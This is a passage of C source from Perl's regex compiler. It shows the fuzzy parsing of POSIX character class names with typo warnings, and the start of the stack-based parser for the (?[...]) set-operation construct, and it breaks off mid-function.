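* exhaustive): "[:alpha:]" is returned as ANYOF_ALPHA; "[:alpha]"
* (no terminating ':') is close enough that it warns "Assuming NOT a
* POSIX class since there is no terminating ':'" and returns
* OOB_NAMEDCLASS; "[:foobar:]" has perfect syntax but an unknown
* name, so it dies with "POSIX class [:foobar:] unknown"; and
* something like "[abc]" is nowhere near a class name, so
* NOT_MEANT_TO_BE_A_POSIX_CLASS is returned with no warning. */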
const char* p = s;
const char * const e = RExC_end;
unsigned complement = 0; /* If to complement the class */
bool found_problem = FALSE; /* Assume OK until proven otherwise */
bool has_opening_bracket = FALSE;
bool has_opening_colon = FALSE;
int class_number = OOB_NAMEDCLASS; /* Out-of-bounds until find
valid class */
const char * possible_end = NULL; /* used for a 2nd parse pass */
const char* name_start; /* ptr to class name first char */
/* If the input name is within this many single-character edits of a
* legal name, it is considered to have meant that legal name */
int max_distance = 2;
/* to store the name. The size determines the maximum length before we
* decide that no posix class was intended. Should be at least
* sizeof("alphanumeric") */
UV input_text[15];
STATIC_ASSERT_DECL(C_ARRAY_LENGTH(input_text) >= sizeof "alphanumeric");
PERL_ARGS_ASSERT_HANDLE_POSSIBLE_POSIX;
CLEAR_POSIX_WARNINGS();
if (p >= e) {
return NOT_MEANT_TO_BE_A_POSIX_CLASS;
}
if (*(p - 1) != '[') {
ADD_POSIX_WARNING(p, "it doesn't start with a '['");
found_problem = TRUE;
}
else {
has_opening_bracket = TRUE;
}
/* They could be confused and think you can put spaces between the
* components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
/* For [. .] and [= =]. These are quite different internally from [: :],
* so they are handled separately. */
if (POSIXCC_NOTYET(*p) && p < e - 3) /* 1 for the close, and 1 for the ']'
and 1 for at least one char in it
*/
{
const char open_char = *p;
const char * temp_ptr = p + 1;
/* These two constructs are not handled by perl, and if we find a
* syntactically valid one, we croak. khw, who wrote this code, finds
* this explanation of them very unclear:
* http://pubs.opengroup.org/onlinepubs/009696899/basedefs/xbd_chap09.html
* And searching the rest of the internet wasn't very helpful either.
* It looks like just about any byte can be in these constructs,
* depending on the locale. But unless the pattern is being compiled
* under /l, which is very rare, Perl runs under the C or POSIX locale.
* In that case, it looks like [= =] isn't allowed at all, and that
* [. .] could be any single code point, but for longer strings the
* constituent characters would have to be the ASCII alphabetics plus
* the minus-hyphen. Any sensible locale definition would limit itself
* to these. And any portable one definitely should. Trying to parse
* the general case is a nightmare (see [perl #127604]). So, this code
* looks only for interiors of these constructs that match:
* qr/.|[-\w]{2,}/
* Using \w relaxes the apparent rules a little, without adding much
* danger of mistaking something else for one of these constructs.
*
* [. .] in some implementations described on the internet is usable to
* escape a character that otherwise is special in bracketed character
* classes. For example [.].] means a literal right bracket instead of
* the ending of the class
*
* [= =] can legitimately contain a [. .] construct, but we don't
* handle this case, as that [. .] construct will later get parsed
* itself and croak then. And [= =] is checked for even when not under
* /l, as Perl has long done so.
*
* The code below relies on there being a trailing NUL, so it doesn't
* have to keep checking if the parse ptr < e.
*/
if (temp_ptr[1] == open_char) {
temp_ptr++;
}
else while ( temp_ptr < e
&& (isWORDCHAR(*temp_ptr) || *temp_ptr == '-'))
{
temp_ptr++;
}
if (*temp_ptr == open_char) {
temp_ptr++;
if (*temp_ptr == ']') {
temp_ptr++;
if (! found_problem && ! check_only) {
RExC_parse = (char *) temp_ptr;
vFAIL3("POSIX syntax [%c %c] is reserved for future "
"extensions", open_char, open_char);
}
/* Here, the syntax wasn't completely valid, or else the call
* is to check-only */
if (updated_parse_ptr) {
*updated_parse_ptr = (char *) temp_ptr;
}
CLEAR_POSIX_WARNINGS_AND_RETURN(OOB_NAMEDCLASS);
}
}
/* If we find something that started out to look like one of these
* constructs, but isn't, we continue below so that it can be checked
* for being a class name with a typo of '.' or '=' instead of a colon.
* */
}
/* Here, we think there is a possibility that a [: :] class was meant, and
* we have the first real character. It could be they think the '^' comes
* first */
if (*p == '^') {
found_problem = TRUE;
ADD_POSIX_WARNING(p + 1, "the '^' must come after the colon");
complement = 1;
p++;
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
}
/* But the first character should be a colon, which they could have easily
* mistyped on a qwerty keyboard as a semi-colon (and which may be hard to
* distinguish from a colon, so treat that as a colon). */
if (*p == ':') {
p++;
has_opening_colon = TRUE;
}
else if (*p == ';') {
found_problem = TRUE;
p++;
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
has_opening_colon = TRUE;
}
else {
found_problem = TRUE;
ADD_POSIX_WARNING(p, "there must be a starting ':'");
/* Consider an initial punctuation (not one of the recognized ones) to
* be a left terminator */
if (*p != '^' && *p != ']' && isPUNCT(*p)) {
p++;
}
}
/* They may think that you can put spaces between the components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (*p == '^') {
/* We consider something like [^:^alnum:]] to not have been intended to
* be a posix class, but XXX maybe we should */
if (complement) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
complement = 1;
p++;
}
/* Again, they may think that you can put spaces between the components */
if (isBLANK(*p)) {
found_problem = TRUE;
do {
p++;
} while (p < e && isBLANK(*p));
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (*p == ']') {
/* XXX This ']' may be a typo, and something else was meant. But
* treating it as such creates enough complications, that that
* possibility isn't currently considered here. So we assume that the
* ']' is what is intended, and if we've already found an initial '[',
* this leaves this construct looking like [:] or [:^], which almost
* certainly weren't intended to be posix classes */
if (has_opening_bracket) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* But this function can be called when we parse the colon for
* something like qr/[alpha:]]/, so we back up to look for the
* beginning */
p--;
if (*p == ';') {
found_problem = TRUE;
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
}
else if (*p != ':') {
/* XXX We are currently very restrictive here, so this code doesn't
* consider the possibility that, say, /[alpha.]]/ was intended to
* be a posix class. */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* Here we have something like 'foo:]'. There was no initial colon,
* and we back up over 'foo'. XXX Unlike the going-forward case, we
* don't handle typos of non-word chars in the middle */
has_opening_colon = FALSE;
p--;
while (p > RExC_start && isWORDCHAR(*p)) {
p--;
}
p++;
/* Here, we have positioned ourselves to where we think the first
* character in the potential class is */
}
/* Now the interior really starts. There are certain key characters that
* can end the interior, or these could just be typos. To catch both
* cases, we may have to do two passes. In the first pass, we keep on
* going unless we come to a sequence that matches
* qr/ [[:punct:]] [[:blank:]]* \] /xa
* This means it takes a whole sequence to end the pass, so ending it
* prematurely would require two typos in a row if that wasn't what was
* intended. If the class is perfectly formed, just
* this one pass is needed. We also stop if there are too many characters
* being accumulated, but this number is deliberately set higher than any
* real class. It is set high enough so that someone who thinks that
* 'alphanumeric' is a correct name would get warned that it wasn't.
* While doing the pass, we keep track of where the key characters were in
* it. If we don't find an end to the class, and one of the key characters
* was found, we redo the pass, but stop when we get to that character.
* Thus the key character was considered a typo in the first pass, but a
* terminator in the second. If two key characters are found, we stop at
* the second one in the first pass. Again this can miss two typos, but
* catches a single one
*
* In the first pass, 'possible_end' starts as NULL, and then gets set to
* point to the first key character. For the second pass, it starts as -1.
* */
name_start = p;
parse_name:
{
bool has_blank = FALSE;
bool has_upper = FALSE;
bool has_terminating_colon = FALSE;
bool has_terminating_bracket = FALSE;
bool has_semi_colon = FALSE;
unsigned int name_len = 0;
int punct_count = 0;
while (p < e) {
/* Squeeze out blanks when looking up the class name below */
if (isBLANK(*p) ) {
has_blank = TRUE;
found_problem = TRUE;
p++;
continue;
}
/* The name will end with a punctuation */
if (isPUNCT(*p)) {
const char * peek = p + 1;
/* Treat any non-']' punctuation followed by a ']' (possibly
* with intervening blanks) as trying to terminate the class.
* ']]' is very likely to mean a class was intended (but
* missing the colon), but the warning message that gets
* generated shows the error position better if we exit the
* loop at the bottom (eventually), so skip it here. */
if (*p != ']') {
if (peek < e && isBLANK(*peek)) {
has_blank = TRUE;
found_problem = TRUE;
do {
peek++;
} while (peek < e && isBLANK(*peek));
}
if (peek < e && *peek == ']') {
has_terminating_bracket = TRUE;
if (*p == ':') {
has_terminating_colon = TRUE;
}
else if (*p == ';') {
has_semi_colon = TRUE;
has_terminating_colon = TRUE;
}
else {
found_problem = TRUE;
}
p = peek + 1;
goto try_posix;
}
}
/* Here we have punctuation we thought didn't end the class.
* Keep track of the position of the key characters that are
* more likely to have been class-enders */
if (*p == ']' || *p == '[' || *p == ':' || *p == ';') {
/* Allow just one such possible class-ender not actually
* ending the class. */
if (possible_end) {
break;
}
possible_end = p;
}
/* If we have too many punctuation characters, no use in
* keeping going */
if (++punct_count > max_distance) {
break;
}
/* Treat the punctuation as a typo. */
input_text[name_len++] = *p;
p++;
}
else if (isUPPER(*p)) { /* Use lowercase for lookup */
input_text[name_len++] = toLOWER(*p);
has_upper = TRUE;
found_problem = TRUE;
p++;
} else if (! UTF || UTF8_IS_INVARIANT(*p)) {
input_text[name_len++] = *p;
p++;
}
else {
input_text[name_len++] = utf8_to_uvchr_buf((U8 *) p, e, NULL);
p+= UTF8SKIP(p);
}
/* The size of 'input_text' is the longest we allow a potential
* class name to be, before deciding they didn't mean a class name at
* all */
if (name_len >= C_ARRAY_LENGTH(input_text)) {
break;
}
}
/* We get to here when the possible class name hasn't been properly
* terminated before:
* 1) we ran off the end of the pattern; or
* 2) found two characters, each of which might have been intended to
* be the name's terminator
* 3) found so many punctuation characters in the purported name,
* that the edit distance to a valid one is exceeded
* 4) we accumulated more characters than anyone could have
* intended a class name to be. */
found_problem = TRUE;
/* In the final two cases, we know that looking up what we've
* accumulated won't lead to a match, even a fuzzy one. */
if ( name_len >= C_ARRAY_LENGTH(input_text)
|| punct_count > max_distance)
{
/* If there was an intermediate key character that could have been
* an intended end, redo the parse, but stop there */
if (possible_end && possible_end != (char *) -1) {
possible_end = (char *) -1; /* Special signal value to say
we've done a first pass */
p = name_start;
goto parse_name;
}
/* Otherwise, it can't have meant to have been a class */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* If we ran off the end, and the final character was a punctuation
* one, back up one, to look at that final one just below. Later, we
* will restore the parse pointer if appropriate */
if (name_len && p == e && isPUNCT(*(p-1))) {
p--;
name_len--;
}
if (p < e && isPUNCT(*p)) {
if (*p == ']') {
has_terminating_bracket = TRUE;
/* If this is a 2nd ']', and the first one is just below this
* one, consider that to be the real terminator. This gives a
* uniform and better positioning for the warning message */
if ( possible_end
&& possible_end != (char *) -1
&& *possible_end == ']'
&& name_len && input_text[name_len - 1] == ']')
{
name_len--;
p = possible_end;
/* And this is actually equivalent to having done the 2nd
* pass now, so set it to not try again */
possible_end = (char *) -1;
}
}
else {
if (*p == ':') {
has_terminating_colon = TRUE;
}
else if (*p == ';') {
has_semi_colon = TRUE;
has_terminating_colon = TRUE;
}
p++;
}
}
try_posix:
/* Here, we have a class name to look up. We can short circuit the
* stuff below for short names that can't possibly be meant to be a
* class name. (We can do this on the first pass, as any second pass
* will yield an even shorter name) */
if (name_len < 3) {
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
/* Find which class it is. Initially switch on the length of the name.
* */
switch (name_len) {
case 4:
if (memEQs(name_start, 4, "word")) {
/* this is not POSIX, this is the Perl \w */
class_number = ANYOF_WORDCHAR;
}
break;
case 5:
/* Names all of length 5: alnum alpha ascii blank cntrl digit
* graph lower print punct space upper
* Offset 4 gives the best switch position. */
switch (name_start[4]) {
case 'a':
if (memBEGINs(name_start, 5, "alph")) /* alpha */
class_number = ANYOF_ALPHA;
break;
case 'e':
if (memBEGINs(name_start, 5, "spac")) /* space */
class_number = ANYOF_SPACE;
break;
case 'h':
if (memBEGINs(name_start, 5, "grap")) /* graph */
class_number = ANYOF_GRAPH;
break;
case 'i':
if (memBEGINs(name_start, 5, "asci")) /* ascii */
class_number = ANYOF_ASCII;
break;
case 'k':
if (memBEGINs(name_start, 5, "blan")) /* blank */
class_number = ANYOF_BLANK;
break;
case 'l':
if (memBEGINs(name_start, 5, "cntr")) /* cntrl */
class_number = ANYOF_CNTRL;
break;
case 'm':
if (memBEGINs(name_start, 5, "alnu")) /* alnum */
class_number = ANYOF_ALPHANUMERIC;
break;
case 'r':
if (memBEGINs(name_start, 5, "lowe")) /* lower */
class_number = (FOLD) ? ANYOF_CASED : ANYOF_LOWER;
else if (memBEGINs(name_start, 5, "uppe")) /* upper */
class_number = (FOLD) ? ANYOF_CASED : ANYOF_UPPER;
break;
case 't':
if (memBEGINs(name_start, 5, "digi")) /* digit */
class_number = ANYOF_DIGIT;
else if (memBEGINs(name_start, 5, "prin")) /* print */
class_number = ANYOF_PRINT;
else if (memBEGINs(name_start, 5, "punc")) /* punct */
class_number = ANYOF_PUNCT;
break;
}
break;
case 6:
if (memEQs(name_start, 6, "xdigit"))
class_number = ANYOF_XDIGIT;
break;
}
/* If the name exactly matches a posix class name the class number will
* here be set to it, and the input almost certainly was meant to be a
* posix class, so we can skip further checking. If instead the syntax
* is exactly correct, but the name isn't one of the legal ones, we
* will return that as an error below. But if neither of these apply,
* it could be that no posix class was intended at all, or that one
* was, but there was a typo. We tease these apart by doing fuzzy
* matching on the name */
if (class_number == OOB_NAMEDCLASS && found_problem) {
const UV posix_names[][6] = {
{ 'a', 'l', 'n', 'u', 'm' },
{ 'a', 'l', 'p', 'h', 'a' },
{ 'a', 's', 'c', 'i', 'i' },
{ 'b', 'l', 'a', 'n', 'k' },
{ 'c', 'n', 't', 'r', 'l' },
{ 'd', 'i', 'g', 'i', 't' },
{ 'g', 'r', 'a', 'p', 'h' },
{ 'l', 'o', 'w', 'e', 'r' },
{ 'p', 'r', 'i', 'n', 't' },
{ 'p', 'u', 'n', 'c', 't' },
{ 's', 'p', 'a', 'c', 'e' },
{ 'u', 'p', 'p', 'e', 'r' },
{ 'w', 'o', 'r', 'd' },
{ 'x', 'd', 'i', 'g', 'i', 't' }
};
/* The names of the above all have added NULs to make them the same
* size, so we need to also have the real lengths */
const UV posix_name_lengths[] = {
sizeof("alnum") - 1,
sizeof("alpha") - 1,
sizeof("ascii") - 1,
sizeof("blank") - 1,
sizeof("cntrl") - 1,
sizeof("digit") - 1,
sizeof("graph") - 1,
sizeof("lower") - 1,
sizeof("print") - 1,
sizeof("punct") - 1,
sizeof("space") - 1,
sizeof("upper") - 1,
sizeof("word") - 1,
sizeof("xdigit")- 1
};
unsigned int i;
int temp_max = max_distance; /* Use a temporary, so if we
reparse, we haven't changed the
outer one */
/* Use a smaller max edit distance if we are missing one of the
* delimiters */
if ( has_opening_bracket + has_opening_colon < 2
|| has_terminating_bracket + has_terminating_colon < 2)
{
temp_max--;
}
/* See if the input name is close to a legal one */
for (i = 0; i < C_ARRAY_LENGTH(posix_names); i++) {
/* Short circuit call if the lengths are too far apart to be
* able to match */
if (abs( (int) (name_len - posix_name_lengths[i]))
> temp_max)
{
continue;
}
if (edit_distance(input_text,
posix_names[i],
name_len,
posix_name_lengths[i],
temp_max
)
> -1)
{ /* If it is close, it probably was intended to be a class */
goto probably_meant_to_be;
}
}
/* Here the input name is not close enough to a valid class name
* for us to consider it to be intended to be a posix class. If
* we haven't already done so, and the parse found a character that
         * could have been a terminator for the name, but which we absorbed
         * as a typo during the first pass, repeat the parse, signalling it
* to stop at that character */
if (possible_end && possible_end != (char *) -1) {
possible_end = (char *) -1;
p = name_start;
goto parse_name;
}
/* Here neither pass found a close-enough class name */
CLEAR_POSIX_WARNINGS_AND_RETURN(NOT_MEANT_TO_BE_A_POSIX_CLASS);
}
probably_meant_to_be:
/* Here we think that a posix specification was intended. Update any
* parse pointer */
if (updated_parse_ptr) {
*updated_parse_ptr = (char *) p;
}
/* If a posix class name was intended but incorrectly specified, we
* output or return the warnings */
if (found_problem) {
/* We set flags for these issues in the parse loop above instead of
* adding them to the list of warnings, because we can parse it
* twice, and we only want one warning instance */
if (has_upper) {
ADD_POSIX_WARNING(p, "the name must be all lowercase letters");
}
if (has_blank) {
ADD_POSIX_WARNING(p, NO_BLANKS_POSIX_WARNING);
}
if (has_semi_colon) {
ADD_POSIX_WARNING(p, SEMI_COLON_POSIX_WARNING);
}
else if (! has_terminating_colon) {
ADD_POSIX_WARNING(p, "there is no terminating ':'");
}
if (! has_terminating_bracket) {
ADD_POSIX_WARNING(p, "there is no terminating ']'");
}
if ( posix_warnings
&& RExC_warn_text
&& av_top_index(RExC_warn_text) > -1)
{
*posix_warnings = RExC_warn_text;
}
}
else if (class_number != OOB_NAMEDCLASS) {
/* If it is a known class, return the class. The class number
* #defines are structured so each complement is +1 to the normal
* one */
CLEAR_POSIX_WARNINGS_AND_RETURN(class_number + complement);
}
else if (! check_only) {
/* Here, it is an unrecognized class. This is an error (unless the
* call is to check only, which we've already handled above) */
const char * const complement_string = (complement)
? "^"
: "";
RExC_parse = (char *) p;
vFAIL3utf8f("POSIX class [:%s%" UTF8f ":] unknown",
complement_string,
UTF8fARG(UTF, RExC_parse - name_start - 2, name_start));
}
}
return OOB_NAMEDCLASS;
}
#undef ADD_POSIX_WARNING
STATIC unsigned int
S_regex_set_precedence(const U8 my_operator) {
/* Returns the precedence in the (?[...]) construct of the input operator,
* specified by its character representation. The precedence follows
* general Perl rules, but it extends this so that ')' and ']' have (low)
* precedence even though they aren't really operators */
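    /* Reading the table below (an illustrative note, not additional rules):
     * '!' binds tightest, then '&', then '^', '|', '+' and '-', with ')' and
     * ']' lowest of all.  So in an expression like 'a | b & c' (used as an
     * example in the stack discussion further on) the '&' gets evaluated
     * before the '|' */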
switch (my_operator) {
case '!':
return 5;
case '&':
return 4;
case '^':
case '|':
case '+':
case '-':
return 3;
case ')':
return 2;
case ']':
return 1;
}
NOT_REACHED; /* NOTREACHED */
return 0; /* Silence compiler warning */
}
STATIC regnode_offset
S_handle_regex_sets(pTHX_ RExC_state_t *pRExC_state, SV** return_invlist,
I32 *flagp, U32 depth,
char * const oregcomp_parse)
{
/* Handle the (?[...]) construct to do set operations */
U8 curchar; /* Current character being parsed */
UV start, end; /* End points of code point ranges */
SV* final = NULL; /* The end result inversion list */
SV* result_string; /* 'final' stringified */
AV* stack; /* stack of operators and operands not yet
resolved */
AV* fence_stack = NULL; /* A stack containing the positions in
'stack' of where the undealt-with left
parens would be if they were actually
put there */
/* The 'volatile' is a workaround for an optimiser bug
* in Solaris Studio 12.3. See RT #127455 */
volatile IV fence = 0; /* Position of where most recent undealt-
with left paren in stack is; -1 if none.
*/
STRLEN len; /* Temporary */
regnode_offset node; /* Temporary, and final regnode returned by
this function */
const bool save_fold = FOLD; /* Temporary */
char *save_end, *save_parse; /* Temporaries */
const bool in_locale = LOC; /* we turn off /l during processing */
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_HANDLE_REGEX_SETS;
DEBUG_PARSE("xcls");
if (in_locale) {
set_regex_charset(&RExC_flags, REGEX_UNICODE_CHARSET);
}
/* The use of this operator implies /u. This is required so that the
* compile time values are valid in all runtime cases */
REQUIRE_UNI_RULES(flagp, 0);
ckWARNexperimental(RExC_parse,
WARN_EXPERIMENTAL__REGEX_SETS,
"The regex_sets feature is experimental");
/* Everything in this construct is a metacharacter. Operands begin with
* either a '\' (for an escape sequence), or a '[' for a bracketed
* character class. Any other character should be an operator, or
* parenthesis for grouping. Both types of operands are handled by calling
* regclass() to parse them. It is called with a parameter to indicate to
* return the computed inversion list. The parsing here is implemented via
* a stack. Each entry on the stack is a single character representing one
* of the operators; or else a pointer to an operand inversion list. */
#define IS_OPERATOR(a) SvIOK(a)
#define IS_OPERAND(a) (! IS_OPERATOR(a))
/* The stack is kept in Łukasiewicz order. (That's pronounced similar
* to luke-a-shave-itch (or -itz), but people who didn't want to bother
* with pronouncing it called it Reverse Polish instead, but now that YOU
* know how to pronounce it you can use the correct term, thus giving due
* credit to the person who invented it, and impressing your geek friends.
     * Wikipedia says that the pronunciation of "Ł" has been changing so that
* it is now more like an English initial W (as in wonk) than an L.)
*
* This means that, for example, 'a | b & c' is stored on the stack as
*
* c [4]
* b [3]
* & [2]
* a [1]
* | [0]
*
* where the numbers in brackets give the stack [array] element number.
* In this implementation, parentheses are not stored on the stack.
* Instead a '(' creates a "fence" so that the part of the stack below the
* fence is invisible except to the corresponding ')' (this allows us to
* replace testing for parens, by using instead subtraction of the fence
* position). As new operands are processed they are pushed onto the stack
* (except as noted in the next paragraph). New operators of higher
* precedence than the current final one are inserted on the stack before
* the lhs operand (so that when the rhs is pushed next, everything will be
     * in the correct positions shown above.)  When an operator of equal or
* lower precedence is encountered in parsing, all the stacked operations
* of equal or higher precedence are evaluated, leaving the result as the
* top entry on the stack. This makes higher precedence operations
* evaluate before lower precedence ones, and causes operations of equal
* precedence to left associate.
*
* The only unary operator '!' is immediately pushed onto the stack when
* encountered. When an operand is encountered, if the top of the stack is
     * a '!', the complement is immediately performed, and the '!' popped. The
* resulting value is treated as a new operand, and the logic in the
* previous paragraph is executed. Thus in the expression
* [a] + ! [b]
* the stack looks like
*
* !
* a
* +
*
* as 'b' gets parsed, the latter gets evaluated to '!b', and the stack
* becomes
*
* !b
* a
* +
*
* A ')' is treated as an operator with lower precedence than all the
* aforementioned ones, which causes all operations on the stack above the
* corresponding '(' to be evaluated down to a single resultant operand.
* Then the fence for the '(' is removed, and the operand goes through the
* algorithm above, without the fence.
*
* A separate stack is kept of the fence positions, so that the position of
* the latest so-far unbalanced '(' is at the top of it.
*
* The ']' ending the construct is treated as the lowest operator of all,
* so that everything gets evaluated down to a single operand, which is the
* result */
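    /* A small illustrative trace (worked out by hand from the description
     * above; it is not output of the debugging dump): for
     *
     *      (?[ [a] - ( [b] + [c] ) ])
     *
     * the stack just after the '(' has been processed is
     *
     *      [a]   [1]
     *      -     [0]
     *
     * with the fence sitting above element [1] and its position saved on
     * 'fence_stack'.  The '[b] + [c]' part is then parsed and evaluated
     * entirely above the fence; the matching ')' reduces it to a single
     * operand, pops the fence, and feeds that operand back through the
     * normal operand handling, so the pending '-' is applied only when the
     * terminating ']' is reached */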
sv_2mortal((SV *)(stack = newAV()));
sv_2mortal((SV *)(fence_stack = newAV()));
while (RExC_parse < RExC_end) {
I32 top_index; /* Index of top-most element in 'stack' */
SV** top_ptr; /* Pointer to top 'stack' element */
SV* current = NULL; /* To contain the current inversion list
operand */
SV* only_to_avoid_leaks;
skip_to_be_ignored_text(pRExC_state, &RExC_parse,
TRUE /* Force /x */ );
if (RExC_parse >= RExC_end) { /* Fail */
break;
}
curchar = UCHARAT(RExC_parse);
redo_curchar:
#ifdef ENABLE_REGEX_SETS_DEBUGGING
/* Enable with -Accflags=-DENABLE_REGEX_SETS_DEBUGGING */
DEBUG_U(dump_regex_sets_structures(pRExC_state,
stack, fence, fence_stack));
#endif
top_index = av_tindex_skip_len_mg(stack);
switch (curchar) {
SV** stacked_ptr; /* Ptr to something already on 'stack' */
char stacked_operator; /* The topmost operator on the 'stack'. */
SV* lhs; /* Operand to the left of the operator */
SV* rhs; /* Operand to the right of the operator */
SV* fence_ptr; /* Pointer to top element of the fence
stack */
case '(':
if ( RExC_parse < RExC_end - 2
&& UCHARAT(RExC_parse + 1) == '?'
&& UCHARAT(RExC_parse + 2) == '^')
{
/* If is a '(?', could be an embedded '(?^flags:(?[...])'.
* This happens when we have some thing like
*
* my $thai_or_lao = qr/(?[ \p{Thai} + \p{Lao} ])/;
* ...
* qr/(?[ \p{Digit} & $thai_or_lao ])/;
*
* Here we would be handling the interpolated
* '$thai_or_lao'. We handle this by a recursive call to
* ourselves which returns the inversion list the
* interpolated expression evaluates to. We use the flags
* from the interpolated pattern. */
U32 save_flags = RExC_flags;
const char * save_parse;
RExC_parse += 2; /* Skip past the '(?' */
save_parse = RExC_parse;
/* Parse the flags for the '(?'. We already know the first
* flag to parse is a '^' */
parse_lparen_question_flags(pRExC_state);
if ( RExC_parse >= RExC_end - 4
|| UCHARAT(RExC_parse) != ':'
|| UCHARAT(++RExC_parse) != '('
|| UCHARAT(++RExC_parse) != '?'
|| UCHARAT(++RExC_parse) != '[')
{
/* In combination with the above, this moves the
* pointer to the point just after the first erroneous
* character. */
if (RExC_parse >= RExC_end - 4) {
RExC_parse = RExC_end;
}
else if (RExC_parse != save_parse) {
RExC_parse += (UTF)
? UTF8_SAFE_SKIP(RExC_parse, RExC_end)
: 1;
}
vFAIL("Expecting '(?flags:(?[...'");
}
/* Recurse, with the meat of the embedded expression */
RExC_parse++;
            if (! handle_regex_sets(pRExC_state, &current, flagp,
depth+1, oregcomp_parse))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
}
/* Here, 'current' contains the embedded expression's
* inversion list, and RExC_parse points to the trailing
* ']'; the next character should be the ')' */
RExC_parse++;
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for nested extended charclass");
/* Then the ')' matching the original '(' handled by this
* case: statement */
RExC_parse++;
if (UCHARAT(RExC_parse) != ')')
vFAIL("Expecting close paren for wrapper for nested extended charclass");
RExC_flags = save_flags;
goto handle_operand;
}
/* A regular '('. Look behind for illegal syntax */
if (top_index - fence >= 0) {
/* If the top entry on the stack is an operator, it had
* better be a '!', otherwise the entry below the top
* operand should be an operator */
if ( ! (top_ptr = av_fetch(stack, top_index, FALSE))
|| (IS_OPERATOR(*top_ptr) && SvUV(*top_ptr) != '!')
|| ( IS_OPERAND(*top_ptr)
&& ( top_index - fence < 1
|| ! (stacked_ptr = av_fetch(stack,
top_index - 1,
FALSE))
|| ! IS_OPERATOR(*stacked_ptr))))
{
RExC_parse++;
vFAIL("Unexpected '(' with no preceding operator");
}
}
/* Stack the position of this undealt-with left paren */
av_push(fence_stack, newSViv(fence));
fence = top_index + 1;
break;
case '\\':
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!regclass(pRExC_state, flagp, depth+1,
TRUE, /* means parse just the next thing */
FALSE, /* don't allow multi-char folds */
FALSE, /* don't silence non-portable warnings. */
TRUE, /* strict */
FALSE, /* Require return to be an ANYOF */
                          &current))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
/* regclass() will return with parsing just the \ sequence,
* leaving the parse pointer at the next thing to parse */
RExC_parse--;
goto handle_operand;
case '[': /* Is a bracketed character class */
{
/* See if this is a [:posix:] class. */
bool is_posix_class = (OOB_NAMEDCLASS
< handle_possible_posix(pRExC_state,
RExC_parse + 1,
NULL,
NULL,
TRUE /* checking only */));
/* If it is a posix class, leave the parse pointer at the '['
* to fool regclass() into thinking it is part of a
* '[[:posix:]]'. */
if (! is_posix_class) {
RExC_parse++;
}
/* regclass() can only return RESTART_PARSE and NEED_UTF8 if
* multi-char folds are allowed. */
if (!regclass(pRExC_state, flagp, depth+1,
is_posix_class, /* parse the whole char
class only if not a
posix class */
FALSE, /* don't allow multi-char folds */
TRUE, /* silence non-portable warnings. */
TRUE, /* strict */
FALSE, /* Require return to be an ANYOF */
                          &current))
{
RETURN_FAIL_ON_RESTART(*flagp, flagp);
goto regclass_failed;
}
if (! current) {
break;
}
/* function call leaves parse pointing to the ']', except if we
* faked it */
if (is_posix_class) {
RExC_parse--;
}
goto handle_operand;
}
case ']':
if (top_index >= 1) {
goto join_operators;
}
/* Only a single operand on the stack: are done */
goto done;
case ')':
if (av_tindex_skip_len_mg(fence_stack) < 0) {
if (UCHARAT(RExC_parse - 1) == ']') {
break;
}
RExC_parse++;
vFAIL("Unexpected ')'");
}
/* If nothing after the fence, is missing an operand */
if (top_index - fence < 0) {
RExC_parse++;
goto bad_syntax;
}
/* If at least two things on the stack, treat this as an
* operator */
if (top_index - fence >= 1) {
goto join_operators;
}
/* Here only a single thing on the fenced stack, and there is a
* fence. Get rid of it */
fence_ptr = av_pop(fence_stack);
assert(fence_ptr);
fence = SvIV(fence_ptr);
SvREFCNT_dec_NN(fence_ptr);
fence_ptr = NULL;
if (fence < 0) {
fence = 0;
}
/* Having gotten rid of the fence, we pop the operand at the
* stack top and process it as a newly encountered operand */
current = av_pop(stack);
if (IS_OPERAND(current)) {
goto handle_operand;
}
RExC_parse++;
goto bad_syntax;
case '&':
case '|':
case '+':
case '-':
case '^':
/* These binary operators should have a left operand already
* parsed */
if ( top_index - fence < 0
|| top_index - fence == 1
|| ( ! (top_ptr = av_fetch(stack, top_index, FALSE)))
|| ! IS_OPERAND(*top_ptr))
{
goto unexpected_binary;
}
/* If only the one operand is on the part of the stack visible
* to us, we just place this operator in the proper position */
if (top_index - fence < 2) {
/* Place the operator before the operand */
SV* lhs = av_pop(stack);
av_push(stack, newSVuv(curchar));
av_push(stack, lhs);
break;
}
/* But if there is something else on the stack, we need to
* process it before this new operator if and only if the
* stacked operation has equal or higher precedence than the
* new one */
join_operators:
/* The operator on the stack is supposed to be below both its
* operands */
if ( ! (stacked_ptr = av_fetch(stack, top_index - 2, FALSE))
|| IS_OPERAND(*stacked_ptr))
{
/* But if not, it's legal and indicates we are completely
* done if and only if we're currently processing a ']',
* which should be the final thing in the expression */
if (curchar == ']') {
goto done;
}
unexpected_binary:
RExC_parse++;
vFAIL2("Unexpected binary operator '%c' with no "
"preceding operand", curchar);
}
stacked_operator = (char) SvUV(*stacked_ptr);
if (regex_set_precedence(curchar)
> regex_set_precedence(stacked_operator))
{
